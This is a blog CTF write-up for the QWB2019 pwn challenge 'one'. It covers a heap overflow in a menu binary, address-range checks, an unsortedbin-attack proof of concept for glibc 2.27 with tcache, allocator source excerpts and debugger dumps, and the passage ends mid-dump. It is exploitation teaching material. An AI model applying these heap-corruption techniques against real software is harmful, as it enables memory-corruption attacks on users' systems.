<!doctype html>



  



    
  

<html class="theme-next logos use-motion" lang="zh-hk">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">



<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">












  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.useso.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css">


  <meta name="keywords" content="Hexo, NexT">








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.0">






<meta name="description" content="This time I want to share a challange from last weekend’s QWB game, which only allows Chinese team to participate. This particular challenage one, I did not have time to look during the game, but when">
<meta property="og:type" content="article">
<meta property="og:title" content="[QWB2019] one">
<meta property="og:url" content="http://matshao.com/2019/05/31/QWB2019-one/index.html">
<meta property="og:site_name" content="Mid Station">
<meta property="og:description" content="This time I want to share a challange from last weekend’s QWB game, which only allows Chinese team to participate. This particular challenage one, I did not have time to look during the game, but when">
<meta property="og:locale" content="zh-hk">
<meta property="og:updated_time" content="2019-06-01T05:30:31.850Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="[QWB2019] one">
<meta name="twitter:description" content="This time I want to share a challange from last weekend’s QWB game, which only allows Chinese team to participate. This particular challenage one, I did not have time to look during the game, but when">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Logos',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://matshao.com/2019/05/31/QWB2019-one/">





  <title> [QWB2019] one | Mid Station </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-hk">

  





<script>
  	var _mtac = {};
  	(function() {
  		var mta = document.createElement("script");
  		mta.src = "http://pingjs.qq.com/h5/stats.js?v2.0.4";
  		mta.setAttribute("name", "MTAH5");
  		mta.setAttribute("sid", "500688563");
  		var s = document.getElementsByTagName("script")[0];
  		s.parentNode.insertBefore(mta, s);
  	})();
</script>





  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
    <div class="header-logos"> 
      <div class="site-meta ">
  
    <div class="site-meta-headline">
      <a href="/">
        <img class="custom-logo-image" src="/images/logo_light.png" alt="Mid Station">
      </a>
    </div>
  

  <div class="custom-logo-site-title">
    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">Mid Station</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
    
      <p class="site-subtitle"></p>
    
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首頁
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            歸檔
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            關於
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 
            
      </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
  <link itemprop="mainEntityOfPage" href="http://matshao.com/2019/05/31/QWB2019-one/">

  <span style="display:none" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="name" content="Matthew Shao">
    <meta itemprop="description" content>
    <meta itemprop="image" content="/images/avatar.gif">
  </span>

  <span style="display:none" itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="Mid Station">
    <span style="display:none" itemprop="logo" itemscope itemtype="http://schema.org/ImageObject">
      <img style="display:none;" itemprop="url image" alt="Mid Station" src="/images/logo_light.png">
    </span>
  </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                [QWB2019] one
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">發表於</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-05-31T21:25:02+08:00">
                2019-05-31
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分類於</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Hack/" itemprop="url" rel="index">
                    <span itemprop="name">Hack</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          

          
          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>This time I want to share a challange from last weekend’s QWB game, which only allows Chinese team to participate. This particular challenage <code>one</code>, I did not have time to look during the game, but when I solved it, I think it is worth to share. You can download the binary <a href="https://drive.google.com/file/d/1IKZ5ohpFPGtZ_sVXX7vtia3a_gejLe8D/view?usp=sharing" target="_blank" rel="noopener">here</a>.</p>
<a id="more"></a>
<h2 id="Vulnerability"><a href="#Vulnerability" class="headerlink" title="Vulnerability"></a>Vulnerability</h2><p>No surprise, the binary was compiled with full protection.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Arch:     amd64-64-little</span><br><span class="line">RELRO:    Full RELRO</span><br><span class="line">Stack:    Canary found</span><br><span class="line">NX:       NX enabled</span><br><span class="line">PIE:      PIE enabled</span><br></pre></td></tr></table></figure></p>
<p>It is a typical menu program with <code>add</code>, <code>edit</code>, <code>show</code>, <code>delete</code>, and the organizor also provided a libc of <code>2.27</code> version.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">---------menu---------</span><br><span class="line">1. Add String</span><br><span class="line">2. Edit String</span><br><span class="line">3. Show String</span><br><span class="line">4. Del String</span><br><span class="line">5. exit</span><br><span class="line">command&gt;&gt;</span><br></pre></td></tr></table></figure></p>
<p>I soon identify the vulnerability, it locates in <code>edit</code> function:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">unsigned</span> __<span class="function">int64 <span class="title">edit</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> v1; <span class="comment">// [rsp+4h] [rbp-1Ch]</span></span><br><span class="line">  <span class="keyword">char</span> *v2; <span class="comment">// [rsp+8h] [rbp-18h]</span></span><br><span class="line">  <span class="keyword">char</span> v3; <span class="comment">// [rsp+16h] [rbp-Ah]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v4; <span class="comment">// [rsp+18h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v4 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Please give me the index of the string:"</span>);</span><br><span class="line">  v1 = get_int();</span><br><span class="line">  <span class="keyword">if</span> ( v1 &lt; <span class="number">0</span> || v1 &gt; <span class="number">19</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"Sorry~"</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span> <span class="keyword">if</span> ( LIST[v1] )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"Which char do you want to edit:"</span>);</span><br><span class="line">    read_into(&amp;v3, <span class="number">2L</span>L);</span><br><span class="line">    v2 = <span class="built_in">strchr</span>((<span class="keyword">const</span> <span class="keyword">char</span> *)LIST[v1], v3);    <span class="comment">// heap overflow</span></span><br><span class="line">    <span class="keyword">if</span> ( v2 )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">"What do you want to edit it into:"</span>);</span><br><span class="line">      *v2 = getchar();</span><br><span class="line">      getchar();</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">"Success!"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">"Sorry, I can't find it!"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"Sorry~"</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v4;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>we can edit the string content char by char, and the <code>strchar</code> could lead to <strong>heap overflow</strong>. Well, seem not difficult at all, with the <code>tcache poisoning</code> technique, it should be easy enough to solve. However, there is an address sanitization at <code>add</code> function:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">add</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">signed</span> <span class="keyword">int</span> i; <span class="comment">// [rsp+Ch] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt;= <span class="number">19</span>; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( !LIST[i] )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">"Now, you can input your test string:"</span>);</span><br><span class="line">      LIST[i] = <span class="built_in">malloc</span>(<span class="number">0x30</span>uLL);</span><br><span class="line">      check_addr((__int64)LIST[i]);</span><br><span class="line">      <span class="built_in">memset</span>(LIST[i], <span class="number">0</span>, <span class="number">0x30</span>uLL);</span><br><span class="line">      read_into(LIST[i], <span class="number">0x20</span>LL);</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">"Success!"</span>);</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> ( i == <span class="number">20</span> )</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"Sorry,there is no free space here."</span>);</span><br></pre></td></tr></table></figure></p>
<p>and <code>check_addr</code> is like:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">__int64 __<span class="function">fastcall <span class="title">check_addr</span><span class="params">(__int64 addr)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  __int64 result; <span class="comment">// rax</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> ( addr &gt;= LOW &amp;&amp; (result = HIGH, addr &lt;= HIGH) )</span><br><span class="line">    <span class="keyword">return</span> result;</span><br><span class="line">  puts((const char *)'ror!');</span><br><span class="line">  <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p><code>LOW</code> and <code>HIGH</code> is initialized when the program start, <code>LOW</code> is the heap address of very first allocation, and <code>HIGH = LOW + 0x5f0</code>.</p>
<p>Oh, it also provided a secret function, which can leak a code address. The leak is a little bit obscure, I’ll spare this part for the readers to explore. </p>
<h2 id="Analyze"><a href="#Analyze" class="headerlink" title="Analyze"></a>Analyze</h2><p>If we fill all 20 slot, the bss layout is like following memory dump:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; tele <span class="number">0x555555757040</span> <span class="number">0x60</span></span><br><span class="line"><span class="number">00</span>:<span class="number">0000</span>│   <span class="number">0x555555757040</span> —▸ <span class="number">0x555555758260</span> ◂— <span class="number">0xf89d1d7ee4890aeb</span> &lt;--【LOW】</span><br><span class="line"><span class="number">01</span>:<span class="number">0008</span>│   <span class="number">0x555555757048</span> ◂— <span class="number">0x0</span></span><br><span class="line">... ↓</span><br><span class="line">04:0020│   0x555555757060 —▸ 0x5555557570c0 —▸ 0x555555758350 ◂— 0x3030303030303030 ('00000000')</span><br><span class="line">05:0028│   0x555555757068 —▸ 0x555555757060 —▸ 0x5555557570c0 —▸ 0x555555758350 ◂— 0x3030303030303030 ('00000000')</span><br><span class="line"><span class="number">06</span>:<span class="number">0030</span>│   <span class="number">0x555555757070</span> ◂— <span class="number">0x0</span></span><br><span class="line">... ↓</span><br><span class="line"><span class="number">08</span>:<span class="number">0040</span>│   <span class="number">0x555555757080</span> —▸ <span class="number">0x555555758260</span> ◂— <span class="number">0xf89d1d7ee4890aeb</span></span><br><span class="line"><span class="number">09</span>:<span class="number">0048</span>│   <span class="number">0x555555757088</span> —▸ <span class="number">0x555555758290</span> ◂— <span class="number">0x6f20eac2a115b82b</span></span><br><span class="line"><span class="number">0</span>a:<span class="number">0050</span>│   <span class="number">0x555555757090</span> —▸ <span class="number">0x5555557582c0</span> ◂— <span class="number">0x2d5510c9734a0558</span></span><br><span class="line"><span class="number">0b</span>:<span class="number">0058</span>│   <span class="number">0x555555757098</span> —▸ <span class="number">0x5555557582f0</span> ◂— <span class="number">0x8461d8781ccdf6e3</span></span><br><span class="line"><span class="number">0</span>c:<span class="number">0060</span>│   <span class="number">0x5555557570a0</span> —▸ <span class="number">0x555555758320</span> ◂— <span class="number">0x993b489fbeb13115</span></span><br><span class="line"><span class="number">0</span>d:<span class="number">0068</span>│   <span class="number">0x5555557570a8</span> ◂— <span class="number">0x0</span></span><br><span class="line">... ↓</span><br><span class="line">10:0080│   0x5555557570c0 —▸ 0x555555758350 ◂— 0x3030303030303030 ('00000000')</span><br><span class="line">11:0088│   0x5555557570c8 —▸ 0x555555758390 ◂— 0x3131313131313131 ('11111111')</span><br><span class="line">12:0090│   0x5555557570d0 —▸ 0x5555557583d0 ◂— 0x3232323232323232 ('22222222')</span><br><span class="line">13:0098│   0x5555557570d8 —▸ 0x555555758410 ◂— 0x3333333333333333 ('33333333')</span><br><span class="line">14:00a0│   0x5555557570e0 —▸ 0x555555758450 ◂— 0x3434343434343434 ('44444444')</span><br><span class="line">15:00a8│   0x5555557570e8 —▸ 0x555555758490 ◂— 0x3535353535353535 ('55555555')</span><br><span class="line">16:00b0│   0x5555557570f0 —▸ 0x5555557584d0 ◂— 0x3636363636363636 ('66666666')</span><br><span class="line">17:00b8│   0x5555557570f8 —▸ 0x555555758510 ◂— 0x3737373737373737 ('77777777')</span><br><span class="line">18:00c0│   0x555555757100 —▸ 0x555555758550 ◂— 0x3838383838383838 ('88888888')</span><br><span class="line">19:00c8│   0x555555757108 —▸ 0x555555758590 ◂— 0x3939393939393939 ('99999999')</span><br><span class="line">1a:00d0│   0x555555757110 —▸ 0x5555557585d0 ◂— 0x3030303030303030 ('00000000')</span><br><span class="line">1b:00d8│   0x555555757118 —▸ 0x555555758610 ◂— 0x3131313131313131 ('11111111')</span><br><span class="line">1c:00e0│   0x555555757120 —▸ 0x555555758650 ◂— 0x3232323232323232 ('22222222')</span><br><span class="line">1d:00e8│   0x555555757128 —▸ 0x555555758690 ◂— 0x3333333333333333 ('33333333')</span><br><span class="line">1e:00f0│   0x555555757130 —▸ 0x5555557586d0 ◂— 0x3434343434343434 ('44444444')</span><br><span class="line">1f:00f8│   0x555555757138 —▸ 0x555555758710 ◂— 0x3535353535353535 ('55555555')</span><br><span class="line">20:0100│   0x555555757140 —▸ 0x555555758750 ◂— 0x3636363636363636 ('66666666')</span><br><span class="line">21:0108│   0x555555757148 —▸ 0x555555758790 ◂— 0x3737373737373737 ('77777777')</span><br><span class="line">22:0110│   0x555555757150 —▸ 0x5555557587d0 ◂— 0x3838383838383838 ('88888888')</span><br><span class="line">23:0118│   0x555555757158 —▸ 0x555555758810 ◂— 0x3939393939393939 ('99999999')</span><br><span class="line"><span class="number">24</span>:<span class="number">0120</span>│   <span class="number">0x555555757160</span> —▸ <span class="number">0x555555758850</span> ◂— <span class="number">0x0</span> &lt;--【HIGH】</span><br><span class="line"><span class="number">25</span>:<span class="number">0128</span>│   <span class="number">0x555555757168</span> ◂— <span class="number">0x0</span></span><br><span class="line">... ↓</span><br></pre></td></tr></table></figure></p>
<p><code>LOW</code> is <code>0x555555758260</code> and <code>HIGH</code> is <code>0x555555758850</code>, so we can <code>malloc</code> can only return addresses within this range, otherwise, the session died. I considered this as extra mitigation towards <code>tcache poisioning</code>. </p>
<p>We’ve got a code address, a heap overflow. With heap overflow, we can modify <code>0x555555758350</code>‘s content and overflow it to <code>0x555555758390</code>‘s chunksize, change it from <code>0x41</code> to <code>0x441</code>, then we delete it and got a chunk in unsortedbin. This allows us to leak <code>libc</code> address and create overlapping chunk, overlapping chunk also helps us to get <code>heap</code> address. So we can have <code>code</code>, <code>libc</code>, <code>heap</code> address, enough for bypassing <code>PIE</code>. What next?</p>
<h3 id="Unsortedbin-Attack-in-Glibc-2-27"><a href="#Unsortedbin-Attack-in-Glibc-2-27" class="headerlink" title="Unsortedbin Attack in Glibc 2.27"></a>Unsortedbin Attack in Glibc 2.27</h3><p>A straightforward idea is to unlock the address sanitization by overwriting <code>HIGH</code> variable, with unsortedbin attack. I mentioned unsortedbin attack can be very useful in <a href="http://matshao.com/2019/05/04/Heap-Master-Review/">previous writeup</a>, and <a href="https://github.com/shellphish/how2heap" target="_blank" rel="noopener">how2heap</a> concluded this technique can only apply to glibc without tcache feature, which is &lt; 2.26. But is this true?</p>
<p>After some searching, I found <a href="https://github.com/firmianay/CTF-All-In-One/blob/master/doc/3.1.8_heap_exploit_3.md#unsorted_bin_attack" target="_blank" rel="noopener">CTF-All-In-One</a> proposed a method. It provided a poc:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> stack_var = <span class="number">0</span>;</span><br><span class="line">    <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"The target we want to rewrite on stack: %p -&gt; %ld\n\n"</span>, &amp;stack_var, stack_var);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> *p = <span class="built_in">malloc</span>(<span class="number">0x80</span>);</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> *p1 = <span class="built_in">malloc</span>(<span class="number">0x10</span>);</span><br><span class="line">    <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Now, we allocate first small chunk on the heap at: %p\n"</span>,p);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">free</span>(p);</span><br><span class="line">    <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Freed the first chunk to put it in a tcache bin\n"</span>);</span><br><span class="line"></span><br><span class="line">    p[<span class="number">0</span>] = (<span class="keyword">unsigned</span> <span class="keyword">long</span>)(&amp;stack_var);</span><br><span class="line">    <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Overwrite the next ptr with the target address\n"</span>);</span><br><span class="line">    <span class="built_in">malloc</span>(<span class="number">0x80</span>);</span><br><span class="line">    <span class="built_in">malloc</span>(<span class="number">0x80</span>);</span><br><span class="line">    <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Now we malloc twice to make tcache struct's counts '0xff'\n\n"</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">free</span>(p);</span><br><span class="line">    <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Now free again to put it in unsorted bin\n"</span>);</span><br><span class="line">    p[<span class="number">1</span>] = (<span class="keyword">unsigned</span> <span class="keyword">long</span>)(&amp;stack_var - <span class="number">2</span>);</span><br><span class="line">    <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Now write its bk ptr with the target address-0x10: %p\n\n"</span>, (<span class="keyword">void</span>*)p[<span class="number">1</span>]);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">malloc</span>(<span class="number">0x80</span>);</span><br><span class="line">    <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Finally malloc again to get the chunk at target address: %p -&gt; %p\n"</span>, &amp;stack_var, (<span class="keyword">void</span>*)stack_var);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>In short, we can change <code>tcache-&gt;counts[tc_idx] == 0xff</code> by doing tcache poisioning, and it will get into else statement in following  code snippet, which will return directly instead of getting into another round. Noting that <code>mp_.tcache_count = 7</code> by default.<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">if</span> USE_TCACHE</span></span><br><span class="line">	      <span class="comment">/* Fill cache first, return to user only if cache fills.</span></span><br><span class="line"><span class="comment">		 We may return one of these chunks later.  */</span></span><br><span class="line">	      <span class="keyword">if</span> (tcache_nb</span><br><span class="line">		  &amp;&amp; tcache-&gt;counts[tc_idx] &lt; mp_.tcache_count)</span><br><span class="line">		&#123;</span><br><span class="line">		  tcache_put (victim, tc_idx);</span><br><span class="line">		  return_cached = <span class="number">1</span>;</span><br><span class="line">		  <span class="keyword">continue</span>;</span><br><span class="line">		&#125;</span><br><span class="line">	      <span class="keyword">else</span></span><br><span class="line">		&#123;</span><br><span class="line">#endif</span><br><span class="line">              check_malloced_chunk (av, victim, nb);</span><br><span class="line">              <span class="keyword">void</span> *p = chunk2mem (victim);</span><br><span class="line">              alloc_perturb (p, bytes);</span><br><span class="line">              <span class="keyword">return</span> p;</span><br></pre></td></tr></table></figure></p>
<p>Sound good, we can following the steps in poc and do unsortedbin attack against <code>HIGH</code>, in order to unlock the address check mitigation. But once we turn <code>tcache-&gt;counts[tc_idx] == 0xff</code>, it means we can no longer utilize this tcache bin, any free chunk of this size(0x40) will get into fastbin. In this challenge, <code>0x40</code> is the only size we can allocat, and there is no such fake size around regular control-flow hijack target like <code>__malloc_hook</code>.</p>
<h3 id="Tcache-recovering"><a href="#Tcache-recovering" class="headerlink" title="Tcache recovering"></a>Tcache recovering</h3><p>I want to enable tcache again after unsorted bin attack, so we can perform tcache poisoning easily. I looked into the source of <code>_int_free</code>:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">static</span> <span class="keyword">void</span></span><br><span class="line">_int_free (mstate av, mchunkptr p, <span class="keyword">int</span> have_lock)</span><br><span class="line">&#123;</span><br><span class="line">...</span><br><span class="line"><span class="meta">#<span class="meta-keyword">if</span> USE_TCACHE</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">size_t</span> tc_idx = csize2tidx (size);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (tcache</span><br><span class="line">	&amp;&amp; tc_idx &lt; mp_.tcache_bins</span><br><span class="line">	&amp;&amp; tcache-&gt;counts[tc_idx] &lt; mp_.tcache_count)</span><br><span class="line">      &#123;</span><br><span class="line">	tcache_put (p, tc_idx);</span><br><span class="line">	<span class="keyword">return</span>;</span><br><span class="line">      &#125;</span><br><span class="line">  &#125;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line">...</span><br></pre></td></tr></table></figure></p>
<p>Our target is getting into the if statement on line 9, and the key is to make <code>tcache-&gt;counts[tc_idx] &lt; mp_.tcache_count</code> become true. What is <code>mp_</code> then?<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; p mp_</span><br><span class="line">$<span class="number">1</span> = &#123;</span><br><span class="line">  trim_threshold = <span class="number">131072</span>,</span><br><span class="line">  top_pad = <span class="number">131072</span>,</span><br><span class="line">  mmap_threshold = <span class="number">131072</span>,</span><br><span class="line">  arena_test = <span class="number">8</span>,</span><br><span class="line">  arena_max = <span class="number">0</span>,</span><br><span class="line">  n_mmaps = <span class="number">0</span>,</span><br><span class="line">  n_mmaps_max = 